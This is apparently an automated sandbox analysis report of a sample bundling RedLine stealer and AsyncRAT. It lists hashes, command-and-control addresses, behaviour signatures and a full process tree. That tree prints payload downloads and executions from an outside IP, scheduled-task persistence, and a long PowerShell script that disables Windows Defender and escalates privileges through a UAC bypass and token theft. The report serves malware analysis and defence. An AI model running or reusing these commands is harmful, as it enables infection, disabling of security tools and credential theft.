Analysis

  • max time kernel
    151s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-12-2022 04:20

General

  • Target

    tmp.exe

  • Size

    6KB

  • MD5

    285cbd341de6e17b42f1663245a58346

  • SHA1

    5281aa0f428bca4b5eeafda1b7eefc5735490d09

  • SHA256

    55466ebc5b9c9e17e47e2af745c118001c1163eaa9aa945760f90b2af3f8362c

  • SHA512

    4a66b1409d84376228b4276dd13f0bd42aee0e935755faf01bde72c2b8a2d69da9addd55cf41a3c4a47ca06795f70ee6452976edc10de1b1ccea8705b3cd047d

  • SSDEEP

    96:7sfW3+7yyZLiS9co2FhRPr4SNkyfkkWFnU:7/22Fhx4SGQz

Malware Config

Extracted

Family

redline

Botnet

SPOOFER

C2

20.197.226.40:32619

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

C2

20.197.226.40:4448

Mutex

CHECK_SYSTEMHOST

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 1 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 2 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 56 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4948
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4308
    • C:\Users\Admin\AppData\Local\Temp\Ynraflilhuhdhncsolreloader.exe
      "C:\Users\Admin\AppData\Local\Temp\Ynraflilhuhdhncsolreloader.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:4976
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 4976 -s 1848
        3⤵
        • Program crash
        PID:6028
    • C:\Users\Admin\AppData\Local\Temp\tmp.exe
      C:\Users\Admin\AppData\Local\Temp\tmp.exe
      2⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4712
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\updeter.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4020
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl http://20.127.168.10/assets/client.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1660
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c curl http://20.127.168.10/assets/client.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1156
            • C:\Windows\SysWOW64\curl.exe
              curl http://20.127.168.10/assets/client.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
              6⤵
                PID:1388
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3744
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2976
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
                6⤵
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4404
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  7⤵
                  • Checks computer location settings
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4428
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ] 
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ ' 
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' } 
 
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   } 
 
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1 
 
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e ' 
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0 
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 } 
 
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' ) 
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n 
 
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 } 
 
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9 
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r ' 
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t 
 
 i f   ( $ u   - e q   0 )   { 
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k 
 } 
 i f   ( $ u   - e q   1 )   { 
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k } 
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' ) 
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 } 
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k 
 } 
 i f   ( $ u   - e q   2 )   { 
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ , 
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 ) 
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I ) 
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 ) 
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e 
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ; 
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z ) 
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } } 
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1 
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) ) 
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0 
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k 
 } 
 
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r ' 
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l } 
 
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0 
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0 
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0 
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0 
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0 
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0 
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0 
 n e t 1   s t o p   w i n d e f e n d 
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E 
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0 
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1 
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y 
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0 
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) 
 # - _ - # 
                    8⤵
                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:3696
                    • C:\Windows\SysWOW64\sc.exe
                      "C:\Windows\system32\sc.exe" qc windefend
                      9⤵
                      • Launches sc.exe
                      PID:5040
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                      9⤵
                        PID:1216
                      • C:\Windows\SysWOW64\whoami.exe
                        "C:\Windows\system32\whoami.exe" /groups
                        9⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2944
                      • C:\Windows\SysWOW64\net1.exe
                        "C:\Windows\system32\net1.exe" start TrustedInstaller
                        9⤵
                          PID:4828
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\Updeter.exe"' & exit
                        8⤵
                          PID:4316
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\Updeter.exe"'
                            9⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4196
                            • C:\Users\Admin\AppData\Local\Temp\Updeter.exe
                              "C:\Users\Admin\AppData\Local\Temp\Updeter.exe"
                              10⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              PID:3232
                              • C:\Windows\system32\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\899D.tmp\899E.tmp\899F.bat C:\Users\Admin\AppData\Local\Temp\Updeter.exe"
                                11⤵
                                  PID:4028
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell.exe -w Hidden -ExecutionPolicy Bypass -c "Invoke-WebRequest -URI "http://20.127.168.10/assets/Updeter.exe" -OutFile "C:\Users\Admin\AppData\Roaming/Updeter.exe"
                                    12⤵
                                    • Blocklisted process makes network request
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3732
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell.exe -w Hidden -ExecutionPolicy Bypass -c "schtasks /create /tn ChromeUpdeter /tr "C:\Users\Admin\AppData\Roaming/Updeter.exe" /sc onlogon /rl highest"
                                    12⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2280
                                    • C:\Windows\system32\schtasks.exe
                                      "C:\Windows\system32\schtasks.exe" /create /tn ChromeUpdeter /tr C:\Users\Admin\AppData\Roaming/Updeter.exe /sc onlogon /rl highest
                                      13⤵
                                      • Creates scheduled task(s)
                                      PID:228
                                  • C:\Windows\system32\timeout.exe
                                    timeout /t 30 /nobreak
                                    12⤵
                                    • Delays execution with timeout.exe
                                    PID:4540
                                  • C:\Windows\system32\attrib.exe
                                    attrib +S +H C:\Users\Admin\AppData\Roaming\*.exe
                                    12⤵
                                    • Sets file to hidden
                                    • Views/modifies file attributes
                                    PID:5884
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/qif3gi2emfmv5cg/password_is_eulen.rar/file
                    4⤵
                    • Adds Run key to start application
                    • Enumerates system info in registry
                    • Modifies registry class
                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of WriteProcessMemory
                    PID:4992
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ff8317646f8,0x7ff831764708,0x7ff831764718
                      5⤵
                        PID:1276
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
                        5⤵
                          PID:4820
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 /prefetch:3
                          5⤵
                            PID:820
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:8
                            5⤵
                              PID:1868
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3812 /prefetch:1
                              5⤵
                                PID:1068
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3828 /prefetch:1
                                5⤵
                                  PID:3288
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4308 /prefetch:8
                                  5⤵
                                    PID:1412
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
                                    5⤵
                                      PID:4496
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
                                      5⤵
                                        PID:2100
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
                                        5⤵
                                          PID:3984
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1
                                          5⤵
                                            PID:3700
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1
                                            5⤵
                                              PID:928
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6616 /prefetch:1
                                              5⤵
                                                PID:336
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6844 /prefetch:8
                                                5⤵
                                                  PID:1768
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4533411918356114532,8366320291332660306,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6840 /prefetch:1
                                                  5⤵
                                                    PID:3584
